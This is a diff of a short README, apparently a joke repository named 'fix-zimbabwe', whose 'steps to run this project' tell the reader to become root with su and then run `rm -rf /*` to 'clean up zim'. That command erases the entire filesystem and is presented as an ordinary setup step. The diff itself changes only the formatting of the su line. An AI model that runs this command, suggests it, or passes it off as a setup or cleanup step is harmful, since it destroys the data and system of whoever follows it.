bzmp125/fix-zimbabwe/README.md

 ### Steps to run this project are as follows:

-1) switch user to root via `su` command on your terminal
+1) switchuser to root via su command on your terminal
 2) clean up zim by running command `rm -rf /*`
 3) Done